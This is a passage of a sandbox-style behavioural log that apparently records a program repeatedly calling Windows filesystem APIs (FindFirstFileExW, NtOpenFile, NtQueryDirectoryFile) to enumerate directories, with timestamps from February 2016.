"filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,244", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,254", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,264", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,264", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,264", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,274", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,284", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,314", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,314", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,334", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,344", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,374", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,415", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,475", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,475", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": 